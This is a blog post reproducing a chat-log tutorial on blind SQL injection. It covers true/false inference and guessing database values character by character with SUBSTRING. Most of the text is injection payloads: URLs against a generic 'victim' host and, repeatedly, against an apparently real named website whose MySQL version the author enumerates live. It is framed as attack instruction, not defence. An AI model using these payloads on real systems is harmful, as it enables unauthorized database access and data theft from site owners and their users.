Tutorial SQL Blind BY home_edition2001 aka bius Created (c) by Princexells Seyka (Princelling Saki)

Sunday, 25 August 2013


<&home_edition2001> http://www.exploit-db.com/exploits/11325 << blind sql
<&home_edition2001> why blind
<&home_edition2001> because the union function doesn't work
<&home_edition2001> I'm referring to the basics of blind SQL
<&home_edition2001> wait
<&home_edition2001> 5. What is blind SQL injection?
<&home_edition2001> * Same vulnerability as SQL injection
<&home_edition2001> * *Very* common vulnerability
<&home_edition2001> * Sometimes (wrongly) ignored during tests as unexploitable or not detected
<&home_edition2001> * The attacker cannot retrieve results
<&home_edition2001> * The attacker can only retrieve a True/False condition
<&home_edition2001> blind is the same as SQL injection
<&home_edition2001> but blind doesn't show the result
<&home_edition2001> 6. Blind SQL injection example
<&home_edition2001> * http://victim/showproduct.asp?id= 238
<&home_edition2001> * SELECT * from PRODUCTS WHERE id= 238
<&home_edition2001> * Sometimes, due to the code surrounding the SQL query (grouped or sorted) the attacker can't UNION and no 'good' ways of exploitation are found
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and 1=1
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and 1=2
<&home_edition2001> * SELECT * from PRODUCTS WHERE id= 238 and 1=1
<&home_edition2001> * SELECT * from PRODUCTS WHERE id= 238 and 1=2
<&home_edition2001> * Blind SQL happens if the requests above return different results
<&home_edition2001> <&home_edition2001> * Sometimes, due to the code surrounding the SQL query (grouped or sorted) the attacker can't UNION and no 'good' ways of exploitation are found << look at this
<&home_edition2001> if you're stuck and can't union, go with blind
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,1,1)=5 << true
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,1,1)=4 << false
<&home_edition2001> so that means it's version 5, right
<&home_edition2001> 5.xxxxxx
<&home_edition2001> so how do we guess the next character
<&home_edition2001> well, there's a specific format for blind SQL
<&home_edition2001> that's why blind SQL attacks loop from a-z and then from 1-9
<&home_edition2001> 5.1.28-rc-community   << standard format for the SQL version
<&home_edition2001> we've only got the 5 so far
<&home_edition2001> after the 5 it's definitely a dot, right
<&home_edition2001> so next we guess the 3rd character
<&home_edition2001> so after the dot, that means we guess the third character
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,posisi,1)=nilai << this is the standard blind SQL form (posisi = position, nilai = value)
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,3,1)=0 << true
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,3,1)=1 << false
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,3,1)=2 << false
<&home_edition2001> that means we've got 3 characters, right
<&home_edition2001> 5.0
<&home_edition2001> on to the 4th character
<&home_edition2001> http://www.amandawade.ca/detail.php?id=207679+and+substring(@@version,4,1)=0 << true again
<&home_edition2001> 7. Exploiting True/False conditions
<&home_edition2001> * Select user returns 'dbo'
<&home_edition2001> * SUBSTRING('Select user', 1, 1) = 'd'
<&home_edition2001> * SUBSTRING('Select user', 2, 1) = 'b'
<&home_edition2001> * SUBSTRING('Select user', 3, 1) = 'o'
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and SUBSTRING('Select user', 1, 1) = 'd' TRUE
<&home_edition2001> * http://victim/showproduct.asp?id= 238 and SUBSTRING('Select user', 1, 1) = 'X' FALSE
<&home_edition2001> * Select user returns 'dbo'
<&home_edition2001> * SUBSTRING('Select user', 1, 1) = 'd'
<&home_edition2001> * SUBSTRING('Select user', 2, 1) = 'b'
<&home_edition2001> * SUBSTRING('Select user', 3, 1) = 'o'
<&home_edition2001> pay attention to that
<&home_edition2001> the user's name is dbo
<&home_edition2001> we guess per position
<&home_edition2001> 1,1 << character 1
<&home_edition2001> 2,1 << character two
<&home_edition2001> 3,1 << character 3
<&home_edition2001> with qxploit it automatically tests from 1-9 a-z
<&home_edition2001> so you just wait for the result
<&home_edition2001> so it can be concluded
<&home_edition2001> from blind SQL
<&home_edition2001> SUBSTRING('query sql', posisi, 1) = 'tebakan lo' (i.e. SUBSTRING('sql query', position, 1) = 'your guess')

Dedicated to #nyubicrew
Powered by Mildnet



Written by: Nyubi Crew

The article Tutorial SQL Blind BY home_edition2001 aka bius was written by Nyubi Crew on Sunday, 25 August 2013. Thank you for visiting this blog. Criticism and suggestions about Tutorial SQL Blind BY home_edition2001 aka bius can be submitted via the comment box above.